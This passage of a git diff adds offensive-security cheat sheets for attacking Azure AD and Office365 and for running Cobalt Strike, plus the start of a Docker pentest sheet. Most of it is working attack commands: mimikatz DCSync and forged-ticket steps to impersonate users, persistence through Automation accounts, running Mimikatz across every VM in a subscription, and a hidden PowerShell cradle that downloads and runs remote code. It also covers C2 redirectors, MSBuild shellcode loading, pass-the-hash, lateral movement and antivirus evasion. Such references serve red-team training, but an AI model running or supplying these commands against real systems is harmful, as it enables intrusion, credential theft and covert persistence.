+* **Azucar** : Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
+
+  ```powershell
+  # You should use an account with at least read-permission on the assets you want to access
+  git clone https://github.com/nccgroup/azucar.git
+  PS> Get-ChildItem -Recurse c:\Azucar_V10 | Unblock-File
+
+  PS> .\Azucar.ps1 -AuthMode UseCachedCredentials -Verbose -WriteLog -Debug -ExportTo PRINT
+  PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000
+  PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -CertFilePassword MySuperP@ssw0rd! -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000
+
+  # resolve the TenantID for an specific username
+  PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com
+  ```
+
+## Azure Architecture
+
+![Azure Architecture](https://miro.medium.com/max/880/0*-5NqtHX2C8arkwQG)
+
+* Azure AD Joined : https://pbs.twimg.com/media/EQZv62NWAAEQ8wE?format=jpg&name=large
+* Workplace Joined : https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large
+* Hybrid Joined : https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large
+* Workplace joined on AADJ or Hybrid : https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large
+
+## Azure Storage Account -  Access
+
+* Blobs – *.blob.core.windows.net
+    ```powershell
+    $ AzCopy /Source:https://myaccount.blob.core.windows.net/mycontainer /Dest:C:\myfolder /SourceKey:key /S
+    ```
+* File Services – *.file.core.windows.net
+* Data Tables – *.table.core.windows.net
+* Queues – *.queue.core.windows.net
+z
+```powershell
+# https://github.com/NetSPI/MicroBurst
+S C:\> Invoke-EnumerateAzureBlobs -Base secure [-BingAPIKey 12345678901234567899876543210123]
+Found Storage Account -  secure.blob.core.windows.net
+Found Storage Account -  testsecure.blob.core.windows.net
+Found Storage Account -  securetest.blob.core.windows.net
+Found Storage Account -  securedata.blob.core.windows.net
+Found Storage Account -  securefiles.blob.core.windows.net
+Found Storage Account -  securefilestorage.blob.core.windows.net
+Found Storage Account -  securestorageaccount.blob.core.windows.net
+Found Storage Account -  securesql.blob.core.windows.net
+Found Storage Account -  hrsecure.blob.core.windows.net
+Found Storage Account -  secureit.blob.core.windows.net
+Found Storage Account -  secureimages.blob.core.windows.net
+Found Storage Account -  securestorage.blob.core.windows.net
+
+Bing Found Storage Account - notrealstorage.blob.core.windows.net
+
+Found Container - hrsecure.blob.core.windows.net/NETSPItest
+```
+
+
+## Azure AD vs Active Directory
+
+| Active Directory  | Azure AD  |
+|---|---|
+| LDAP  | REST API'S  |
+| NTLM/Kerberos  | OAuth/SAML/OpenID |
+| Structured directory (OU tree)  | Flat structure  |
+| GPO  | No GPO's  |
+| Super fine-tuned access controls  | Predefined roles |
+| Domain/forest  | Tenant  |
+| Trusts  | Guests  |
+
+
+* Password Hash Syncronization (PHS)
+    * Passwords from on-premise AD are sent to the cloud
+    * Use replication via a service account created by AD Connect
+* Pass Through Authentication (PTA)
+    * Possible to perform DLL injection into the PTA agent and intercept authentication requests: credentials in clear-text
+* Connect Windows Server AD to Azure AD using Federation Server (ADFS)
+    * Dir-Sync : Handled by on-premise Windows Server AD, sync username/password
+
+## Azure AD - Enumeration
+
+> By default it is possible to query almost all the information about the directory as authenticated user, even when the Azure portal is restricted, using Azure AD Graph.
+
+```powershell
+$ git clone https://github.com/dirkjanm/ROADtools
+$ pip install roadrecon
+$ roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout]
+$ roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa]
+$ roadrecon dump
+$ roadrecon gui
+```
+
+Can be used in BloodHound using the fork : https://github.com/dirkjanm/BloodHound-AzureAD
+
+```powershell
+PS C:\> git clone https://github.com/adrecon/AzureADRecon.git
+PS C:\> Install-Module -Name AzureAD
+PS C:\> .\AzureADRecon.ps1
+
+or
+
+PS C:\> $username = "username@fqdn"
+PS C:\> $passwd = ConvertTo-SecureString "PlainTextPassword" -AsPlainText -Force
+PS C:\> $creds = New-Object System.Management.Automation.PSCredential ($username, $passwd)
+PS C:\> .\AzureADRecon.ps1 -Credential $creds
+
+PS C:\>.\AzureADRecon.ps1 -GenExcel C:\AzureADRecon-Report-<timestamp>
+```
+
+
+```powershell
+# Azure AD powershell module
+Get-AzureADDirectoryRole
+
+# MSOnline powershell module
+Get-MsolRole
+Get-MsolRoleMember -RoleObjectId XXXXXXXXXX-XXXX-XXXX... | fl
+
+#Connect to Azure AD using Powershell
+install-module azuread
+import-module azuread
+get-module azuread
+connect-azuread
+
+# Get list of users with role global admins# Note that role =! group
+$role = Get-AzureADDirectoryRole | Where-Object {$_.displayName -eq 'Company Administrator'}
+Get-AzureADDirectoryRoleMember -ObjectId $role.ObjectId
+
+# Get all groups and an example using filter
+Get-AzureADGroup
+Get-AzureADGroup -Filter "DisplayName eq 'Intune Administrators'"
+
+# Get Azure AD policy
+Get-AzureADPolicy
+
+# Get Azure AD roles with some examples
+Get-AzureADDirectoryRole
+Get-AzureADDirectoryRole | Where-Object {$_.displayName -eq 'Security Reader'}
+Get-AzureADDirectoryRoleTemplate
+
+# Get Azure AD SPNs
+Get-AzureADServicePrincipal
+
+# Log in using Azure CLI (this is not powershell)
+az login --allow-no-subscriptions
+
+# Get member list using Azure CLI
+az ad group member list --output=json --query='[].{Created:createdDateTime,UPN:userPrincipalName,Name:displayName,Title:jobTitle,Department:department,Email:mail,UserId:mailNickname,Phone:telephoneNumber,Mobile:mobile,Enabled:accountEnabled}' --group='Company Administrators'
+
+# Get user list
+az ad user list --output=json --query='[].{Created:createdDateTime,UPN:userPrincipalName,Name:displayName,Title:jobTitle,Department:department,Email:mail,UserId:mailNickname,Phone:telephoneNumber,Mobile:mobile,Enabled:accountEnabled}' --upn='username@domain.com'
+
+#PS script to get array of users / roles
+$roleUsers = @() 
+$roles=Get-AzureADDirectoryRole
+ 
+ForEach($role in $roles) {
+  $users=Get-AzureADDirectoryRoleMember -ObjectId $role.ObjectId
+  ForEach($user in $users) {
+    write-host $role.DisplayName,$user.DisplayName
+    $obj = New-Object PSCustomObject
+    $obj | Add-Member -type NoteProperty -name RoleName -value ""
+    $obj | Add-Member -type NoteProperty -name UserDisplayName -value ""
+    $obj | Add-Member -type NoteProperty -name IsAdSynced -value false
+    $obj.RoleName=$role.DisplayName
+    $obj.UserDisplayName=$user.DisplayName
+    $obj.IsAdSynced=$user.DirSyncEnabled -eq $true
+    $roleUsers+=$obj
+  }
+}
+$roleUsers
+
+### Enumeration using Microburst
+git clone https://github.com/NetSPI/MicroBurst/blob/master/Get-AzureADDomainInfo.ps1
+Import-Module .\MicroBurst.psm1
+
+# Anonymous enumeration
+Invoke-EnumerateAzureBlobs -Base company
+Invoke-EnumerateAzureSubDomains -base company -verbose
+
+# Authencticated enumeration
+Get-AzureADDomainInfo
+Get-AzureDomainInfo -folder MicroBurst -VerboseGet-MSOLDomainInfo
+Get-MSOLDomainInfo
+```
+
+
+With Microsoft, if you are using any cloud services (Office 365, Exchange Online, etc) with Active Directory (on-prem or in Azure) then an attacker is one credential away from being able to leak your entire Active Directory structure thanks to Azure AD.
+
+1. Authenticate to your webmail portal (i.e. https://webmail.domain.com/)
+2. Change your browser URL to: https://azure.microsoft.com/
+3. Pick the account from the active sessions
+4. Select Azure Active Directory and enjoy!
+
+## Azure AD - Sign in with a service principal
+
+https://docs.microsoft.com/en-us/powershell/azure/authenticate-azureps?view=azps-3.3.0&viewFallbackFrom=azurermps-6.5.0#sign-in-with-a-service-principal
+
+:warning: Service Principal accounts do not require MFA. Anyone with control over Service Principals can assign credentials to them and potentially escalate privileges.
+
+* Password based authentication
+
+    ```powershell
+    # Use the service principal ID for the username
+    $pscredential = Get-Credential
+    Connect-AzAccount -ServicePrincipal -Credential $pscredential -Tenant $tenantId
+    ```
+* Certificate based authentication
+
+    ```powershell
+    Connect-AzAccount -ApplicationId $appId -Tenant $tenantId -CertificateThumbprint <thumbprint>
+    ```
+
+## Azure AD Connect - Password extraction
+
+Credentials in AD Sync : C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf
+
+Tool | Requires code execution on target | DLL dependencies | Requires MSSQL locally | Requires python locally
+--- | --- | --- | --- | ---
+ADSyncDecrypt | Yes | Yes | No | No
+ADSyncGather | Yes | No | No | Yes
+ADSyncQuery | No (network RPC calls only) | No | Yes | Yes
+
+
+```powershell
+git clone https://github.com/fox-it/adconnectdump
+# DCSync with AD Sync account
+```
+
+## Azure AD Connect - MSOL Account's password and DCSync
+
+You can perform **DCSync** attack using the MSOL account.
+
+Prerequisite:
+  * Compromise a server with Azure AD Connect service
+  * Access to ADSyncAdmins or local Administrators groups
+
+Use the script **azuread_decrypt_msol.ps1** from @xpn : https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545#file-azuread_decrypt_msol-ps1 to recover the decrypted password for the MSOL account
+
+## Azure AD Connect - Seamless Single Sign On Silver Ticket
+
+> Anyone who can edit properties of the AZUREADSSOACCS$ account can impersonate any user in Azure AD using Kerberos (if no MFA)
+
+:warning: The password of the AZUREADSSOACC account never changes.
+
+Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsoftazuread-sso.com/) to convert Kerberos tickets to SAML and JWT for Office 365 & Azure
+
+1. NTLM password hash of the AZUREADSSOACC account, e.g. `f9969e088b2c13d93833d0ce436c76dd`. 
+    ```powershell
+    mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit
+    ```
+2. AAD logon name of the user we want to impersonate, e.g. `elrond@contoso.com`. This is typically either his userPrincipalName or mail attribute from the on-prem AD.
+3. SID of the user we want to impersonate, e.g. `S-1-5-21-2121516926-2695913149-3163778339-1234`.
+4. Create the Silver Ticket and inject it into Kerberos cache:
+    ```powershell
+    mimikatz.exe "kerberos::golden /user:elrond
+    /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234
+    /domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd
+    /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit
+    ```
+5. Launch Mozilla Firefox
+6. Go to about:config and set the `network.negotiate-auth.trusted-uris preference` to value `https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com`
+7. Navigate to any web application that is integrated with our AAD domain. Fill in the user name, while leaving the password field empty.
+
+
+## Azure AD - ADFS Federation Server ~Cloud Kerberos
+
+Discover Federation Servers
+* adfs
+* auth
+* fs
+* okta
+* ping
+* sso
+* sts
+
+OWA Version Discovery : autodiscover.domain.com
+
+## Azure AD - Persistence via Automation accounts
+
+* Create a new Automation Account
+    * "Create Azure Run As account": Yes
+* Import a new runbook that creates an AzureAD user with Owner permissions for the subscription*
+    * Sample runbook for this Blog located here – https://github.com/NetSPI/MicroBurst
+    * Publish the runbook
+    * Add a webhook to the runbook
+* Add the AzureAD module to the Automation account
+    * Update the Azure Automation Modules
+* Assign "User Administrator" and "Subscription Owner" rights to the automation account
+* Eventually lose your access…
+* Trigger the webhook with a post request to create the new user
+    ```powershell
+    $uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d"
+    $AccountInfo  = @(@{RequestBody=@{Username="BlogDemoUser";Password="Password123"}})
+    $body = ConvertTo-Json -InputObject $AccountInfo
+    $response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
+    ```
+
+## Azure VM - Execute command as NT SYSTEM with Contributor right
+
+> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as NT Authority\System
+
+```powershell
+PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
+
+ResourceGroupName    Name       
+-----------------    ----       
+TESTRESOURCES        Remote-Test
+PS C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
+```
+
+Against the whole subscription using MicroBurst.ps1
+
+```powershell
+Import-module MicroBurst.psm1
+Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
+```
+
+## Office365 - Enumerating Users
+
+NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.
+
+* Bruteforce user enum : https://bitbucket.org/grimhacker/office365userenum/src/master/ based on the endpoint https://login.microsoftonline.com/getuserrealm.srf?login=firstname.lastname@domain.com&xml=1
+    ```powershell
+    RealmInfo Success="true">
+    <State>3</State>
+    <UserState>2</UserState>
+    <Login>firstname.lastname@domain.com</Login>
+    <NameSpaceType>Federated</NameSpaceType>
+    <DomainName>domain.com</DomainName>
+    <FederationGlobalVersion>-1</FederationGlobalVersion>
+    <AuthURL>
+    https://fws.domain.com/o365/visfed/intrdomain/se/?username=firstname.lastname%40domain.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=
+    </AuthURL>
+    ```
+* Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon
+
+
+## References
+
+* [An introduction to penetration testing Azure - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-azure/)
+* [Running POwershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)
+* [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/)
+* [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/)
+* [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/)
+* [Azure AD Overview](https://www.youtube.com/watch?v=l_pnNpdxj20) 
+* [Windows Azure Active Directory in plain English](https://www.youtube.com/watch?v=IcSATObaQZE)
+* [Building Free Active Directory Lab in Azure - @kamran.bilgrami](https://medium.com/@kamran.bilgrami/ethical-hacking-lessons-building-free-active-directory-lab-in-azure-6c67a7eddd7f) 
+* [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a)
+* [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/)
+* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/)
+* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/)
+* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/)
\ No newline at end of file
diff --git a/Methodology and Resources/Cobalt Strike - Cheatsheet.md b/Methodology and Resources/Cobalt Strike - Cheatsheet.md
new file mode 100644
index 00000000..23aed9cb
--- /dev/null
+++ b/Methodology and Resources/Cobalt Strike - Cheatsheet.md	
@@ -0,0 +1,411 @@
+# Cobalt Strike
+
+> Cobalt Strike is threat emulation software. Red teams and penetration testers use Cobalt Strike to demonstrate the risk of a breach and evaluate mature security programs. Cobalt Strike exploits network vulnerabilities, launches spear phishing campaigns, hosts web drive-by attacks, and generates malware infected files from a powerful graphical user interface that encourages collaboration and reports all activity.
+
+
+```powershell
+$ sudo apt-get update
+$ sudo apt-get install openjdk-11-jdk
+$ sudo apt install proxychains socat
+$ sudo update-java-alternatives -s java-1.11.0-openjdk-amd64
+$ sudo ./teamserver 10.10.10.10 "password" [malleable C2 profile]
+$ ./cobaltstrike
+$ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://campaigns.example.com/download/dnsback'))" 
+```
+
+## Summary
+
+* [Infrastructure](#infrastructure)
+    * [Redirectors](#redirectors)
+    * [Domain fronting](#domain-fronting)
+    * [OpSec](#opsec)
+* [Payloads](#payloads)
+    * [DNS Beacon](#dns-beacon)
+    * [SMB Beacon](#smb-beacon)
+    * [Metasploit compatibility](#metasploit-compatibility)
+    * [Custom Payloads](#custom-payloads)
+* [Malleable C2](#malleable-c2)
+* [Files](#files)
+* [Powershell .NET](#powershell-net)
+* [Lateral Movement](#lateral-movement)
+* [VPN & Pivots](#vpn--pivots)
+* [Kits](#kits)
+    * [Elevate Kit](#elevate-kit)
+    * [Persistence Kit](#persistence-kit)
+    * [Resource Kit](#resource-kit)
+    * [Artifact Kit](#artifact-kit)
+* [References](#references)
+
+
+## Infrastructure
+
+### Redirectors
+
+```powershell
+sudo apt install socat
+socat TCP4-LISTEN:80,fork TCP4:[TEAM SERVER]:80
+```
+
+### Domain Fronting
+
+* New Listener > HTTP Host Header
+* Target Finance & Healthcare domains 
+
+### OpSec
+
+**Don't**
+* Change default self-signed HTTPS certificate
+* Change default port (50050)
+* 0.0.0.0 DNS response
+* Metasploit compatibility, ask for a payload : `wget -U "Internet Explorer" http://127.0.0.1/vl6D`
+
+**Do**
+* Use a redirector (Apache, CDN, ...)
+* Firewall to only accept HTTP/S from the redirectors
+* Firewall 50050 and access via SSH tunnel
+* Edit default HTTP 404 page and Content type: text/plain
+* No staging `set hosts_stage` to `false` in Malleable C2
+
+
+## Payload
+
+### DNS Beacon
+
+* Edit the Zone File for the domain
+* Create an A record for Cobalt Strike system
+* Create an NS record that points to FQDN of your Cobalt Strike system
+
+Your Cobalt Strike team server system must be authoritative for the domains you specify. Create a DNS A record and point it to your Cobalt Strike team server. Use DNS NS records to delegate several domains or sub-domains to your Cobalt Strike team server's A record.
+
+* nslookup jibberish.beacon polling.campaigns.domain.com
+* nslookup jibberish.beacon campaigns.domain.com
+
+Example of DNS on Digital Ocean:
+
+```powershell
+NS  example.com                     directs to 10.10.10.10.            86400
+NS  polling.campaigns.example.com   directs to campaigns.example.com.	3600
+A	campaigns.example.com           directs to 10.10.10.10	            3600 
+```
+
+```powershell
+systemctl disable systemd-resolved
+systemctl stop systemd-resolved
+rm /etc/resolv.conf
+echo "nameserver 8.8.8.8" >  /etc/resolv.conf
+echo "nameserver 8.8.4.4" >>  /etc/resolv.conf
+```
+
+Configuration:
+1. **host**: campaigns.domain.com
+2. **beacon**: polling.campaigns.domain.com
+3. Interact with a beacon, and `sleep 0`
+
+
+### SMB Beacon
+
+Uses Named Pipes.    
+Connect to an SMB Beacon : `link [host] [pipe]`
+
+### Metasploit compatibility
+
+* Payload: windows/meterpreter/reverse_http or windows/meterpreter/reverse_https
+* Set LHOST and LPORT to the beacon
+* Set DisablePayloadHandler to True
+* Set PrependMigrate to True
+* exploit -j
+
+### Custom Payloads
+
+https://ired.team/offensive-security/code-execution/using-msbuild-to-execute-shellcode-in-c
+
+```powershell
+* Attacks > Packages > Payload Generator 
+* Attacks > Packages > Scripted Web Delivery (S)
+$ python2 ./shellcode_encoder.py -cpp -cs -py payload.bin MySecretPassword xor
+$ C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Temp\dns_raw_stageless_x64.xml
+$ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\dns_raw_stageless_x86.xml
+```
+
+## Malleable C2
+
+* Cobalt Strike - Malleable C2 Profiles https://github.com/xx0hcd/Malleable-C2-Profiles
+* Cobalt Strike Malleable C2 Design and Reference Guide https://github.com/threatexpress/malleable-c2
+* Malleable-C2-Profiles https://github.com/rsmudge/Malleable-C2-Profiles
+
+```powershell
+set useragent "SOME AGENT"; # GOOD
+set useragent 'SOME AGENT'; # BAD
+prepend "This is an example;";
+
+# Escape Double quotes
+append "here is \"some\" stuff";
+# Escape Backslashes
+append "more \\ stuff";
+# Some special characters do not need escaping
+prepend "!@#$%^&*()";
+```
+
+Check a profile with `./c2lint`.
+
+```powershell
+#
+# Etumbot Profile
+#   http://www.arbornetworks.com/asert/2014/06/illuminating-the-etumbot-apt-backdoor/
+#
+# Author: @harmj0y
+#
+set sample_name "Etumbot";
+set sleeptime "5000";
+set jitter    "0";
+set maxdns    "255";
+set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";
+
+http-get {
+    set uri "/image/";
+    client {
+        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
+        header "Referer" "http://www.google.com";
+        header "Pragma" "no-cache";
+        header "Cache-Control" "no-cache";
+        metadata {
+            netbios;
+            append "-.jpg";
+            uri-append;
+        }
+    }
+
+    server {
+        header "Content-Type" "img/jpg";
+        header "Server" "Microsoft-IIS/6.0";
+        header "X-Powered-By" "ASP.NET";
+        output {
+            base64;
+            print;
+        }
+    }
+}
+
+http-post {
+    set uri "/history/";
+    client {
+        header "Content-Type" "application/octet-stream";
+        header "Referer" "http://www.google.com";
+        header "Pragma" "no-cache";
+        header "Cache-Control" "no-cache";
+        id {
+            netbiosu;
+            append ".asp";
+            uri-append;
+        }
+        output {
+            base64;
+            print;
+        }
+    }
+
+    server {
+        header "Content-Type" "img/jpg";
+        header "Server" "Microsoft-IIS/6.0";
+        header "X-Powered-By" "ASP.NET";
+        output {
+            base64;
+            print;
+        }
+    }
+}
+```
+
+
+## Files
+
+```powershell
+# List the file on the specified directory
+beacon > ls <C:\Path>
+
+# Change into the specified working directory
+beacon > cd [directory]
+
+# Delete a file\folder
+beacon > rm [file\folder]
+
+# File copy
+beacon > cp [src] [dest]
+
+# Download a file from the path on the Beacon host
+beacon > download [C:\filePath]
+
+# Lists downloads in progress
+beacon > downloads
+
+# Cancel a download currently in progress
+beacon > cancel [*file*]
+
+# Upload a file from the attacker to the current Beacon host
+beacon > upload [/path/to/file]
+```
+
+## Powershell .NET
+
+```powershell
+# Import a Powershell .ps1 script from the control server and save it in memory in Beacon
+beacon > powershell-import [/path/to/script.ps1]
+
+# Setup a local TCP server bound to localhost and download the script imported from above using powershell.exe. Then the specified function and any arguments are executed and output is returned.
+beacon > powershell [commandlet][arguments]
+
+# Launch the given function using Unmanaged Powershell, which does not start powershell.exe. The program used is set by spawnto
+beacon > powerpick [commandlet] [argument]
+
+# Inject Unmanaged Powershell into a specific process and execute the specified command. This is useful for long-running Powershell jobs
+beacon > psinject [pid][arch] [commandlet] [arguments]
+
+# Run a local .NET executable as a Beacon post-exploitation job
+beacon > execute-assembly [/path/to/script.exe] [arguments]
+beacon > execute-assembly /home/audit/Rubeus.exe
+[*] Tasked beacon to run .NET program: Rubeus.exe
+[+] host called home, sent: 318507 bytes
+[+] received output:
+
+   ______        _                      
+  (_____ \      | |                     
+   _____) )_   _| |__  _____ _   _  ___ 
+  |  __  /| | | |  _ \| ___ | | | |/___)
+  | |  \ \| |_| | |_) ) ____| |_| |___ |
+  |_|   |_|____/|____/|_____)____/(___/
+
+  v1.4.2 
+```
+
+## Lateral Movement
+
+:warning: All the commands launch powershell.exe
+
+```powershell
+Beacon Remote Exploits
+======================
+jump [module] [target] [listener] 
+
+    psexec	x86	Use a service to run a Service EXE artifact
+    psexec64	x64	Use a service to run a Service EXE artifact
+    psexec_psh	x86	Use a service to run a PowerShell one-liner
+    winrm	x86	Run a PowerShell script via WinRM
+    winrm64	x64	Run a PowerShell script via WinRM
+
+Beacon Remote Execute Methods
+=============================
+remote-exec [module] [target] [command] 
+
+    Methods                         Description
+    -------                         -----------
+    psexec                          Remote execute via Service Control Manager
+    winrm                           Remote execute via WinRM (PowerShell)
+    wmi                             Remote execute via WMI (PowerShell)
+
+```
+
+Opsec safe Pass-the-Hash:
+1. `mimikatz sekurlsa::pth /user:xxx /domain:xxx /ntlm:xxxx /run:"powershell -w hidden"`
+2. `steal_token PID`
+
+### Assume Control of Artifact
+
+* Use `link` to connect to SMB Beacon
+* Use `connect` to connect to TCP Beacon
+
+
+## VPN & Pivots
+
+:warning: Covert VPN doesn't work with W10, and requires Administrator access to deploy.
+
+> Use socks 8080 to setup a SOCKS4a proxy server on port 8080 (or any other port you choose). This will setup a SOCKS proxy server to tunnel traffic through Beacon. Beacon's sleep time adds latency to any traffic you tunnel through it. Use sleep 0 to make Beacon check-in several times a second.
+
+```powershell
+# Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage.
+beacon > socks [PORT]
+
+# Proxy browser traffic through a specified Internet Explorer process.
+beacon > browserpivot [pid] [x86|x64]
+
+# Bind to the specified port on the Beacon host, and forward any incoming connections to the forwarded host and port.
+beacon > rportfwd [bind port] [forward host] [forward port]
+```
+
+## Kits
+
+### Elevate Kit
+
+UAC Token Duplication : Fixed in Windows 10 Red Stone 5 (October 2018)
+
+```powershell
+beacon> runasadmin
+
+Beacon Command Elevators
+========================
+
+    Exploit                         Description
+    -------                         -----------
+    ms14-058                        TrackPopupMenu Win32k NULL Pointer Dereference (CVE-2014-4113)
+    ms15-051                        Windows ClientCopyImage Win32k Exploit (CVE 2015-1701)
+    ms16-016                        mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051)
+    svc-exe                         Get SYSTEM via an executable run as a service
+    uac-schtasks                    Bypass UAC with schtasks.exe (via SilentCleanup)
+    uac-token-duplication           Bypass UAC with Token Duplication
+```
+
+### Persistence Kit
+
+* https://github.com/0xthirteen/MoveKit
+* https://github.com/fireeye/SharPersist
+    ```powershell
+    # List persistences
+    SharPersist -t schtaskbackdoor -m list
+    SharPersist -t startupfolder -m list
+    SharPersist -t schtask -m list
+
+    # Add a persistence
+    SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
+    SharPersist -t schtaskbackdoor -n "Something Cool" -m remove
+
+    SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add
+    SharPersist -t service -n "Some Service" -m remove
+
+    SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
+    SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
+    SharPersist -t schtask -n "Some Task" -m remove
+    ```
+
+### Resource Kit
+
+> The Resource Kit is Cobalt Strike's means to change the HTA, PowerShell, Python, VBA, and VBS script templates Cobalt Strike uses in its workflows
+
+### Artifact Kit
+
+> Cobalt Strike uses the Artifact Kit to generate its executables and DLLs. The Artifact Kit is a source code framework to build executables and DLLs that evade some anti-virus products. The Artifact Kit build script creates a folder with template artifacts for each Artifact Kit technique. To use a technique with Cobalt Strike, go to Cobalt Strike -> Script Manager, and load the artifact.cna script from that technique's folder.
+
+Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 :
+
+- `sudo apt-get install mingw-w64`
+- Edit the Artifact code
+    * Change pipename strings
+    * Change `VirtualAlloc` in `patch.c`/`patch.exe`, e.g: HeapAlloc
+    * Change Import
+- Build the Artifact
+- Cobalt Strike -> Script Manager > Load .cna
+
+## References
+
+* [Red Team Ops with Cobalt Strike (1 of 9): Operations](https://www.youtube.com/watch?v=q7VQeK533zI)
+* [Red Team Ops with Cobalt Strike (2 of 9): Infrastructure](https://www.youtube.com/watch?v=5gwEMocFkc0)
+* [Red Team Ops with Cobalt Strike (3 of 9): C2](https://www.youtube.com/watch?v=Z8n9bIPAIao)
+* [Red Team Ops with Cobalt Strike (4 of 9): Weaponization](https://www.youtube.com/watch?v=H0_CKdwbMRk)
+* [Red Team Ops with Cobalt Strike (5 of 9): Initial Access](https://www.youtube.com/watch?v=bYt85zm4YT8)
+* [Red Team Ops with Cobalt Strike (6 of 9): Post Exploitation](https://www.youtube.com/watch?v=Pb6yvcB2aYw)
+* [Red Team Ops with Cobalt Strike (7 of 9): Privilege Escalation](https://www.youtube.com/watch?v=lzwwVwmG0io)
+* [Red Team Ops with Cobalt Strike (8 of 9): Lateral Movement](https://www.youtube.com/watch?v=QF_6zFLmLn0)
+* [Red Team Ops with Cobalt Strike (9 of 9): Pivoting](https://www.youtube.com/watch?v=sP1HgUu7duU&list=PL9HO6M_MU2nfQ4kHSCzAQMqxQxH47d1no&index=10&t=0s)
+* [A Deep Dive into Cobalt Strike Malleable C2 - Joe Vest - Sep 5, 2018 ](https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b)
+* [Cobalt Strike. Walkthrough for Red Teamers - Neil Lines - 15 Apr 2019](https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/)
+* [TALES OF A RED TEAMER: HOW TO SETUP A C2 INFRASTRUCTURE FOR COBALT STRIKE – UB 2018 - NOV 25 2018](https://holdmybeersecurity.com/2018/11/25/tales-of-a-red-teamer-how-to-setup-a-c2-infrastructure-for-cobalt-strike-ub-2018/)
+* [Cobalt Strike - DNS Beacon](https://www.cobaltstrike.com/help-dns-beacon)
+* [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/)
\ No newline at end of file
diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md
new file mode 100644
index 00000000..26ca5d9b
--- /dev/null
+++ b/Methodology and Resources/Container - Docker Pentest.md	
@@ -0,0 +1,149 @@
+# Docker Pentest
+
+> Docker is a set of platform as a service (PaaS) products that uses OS-level virtualization to deliver software in packages called containers.
+
+## Summary
+
+- [Tools](#tools)
+- [Mounted Docker Socket](#mounted-docker-socket)
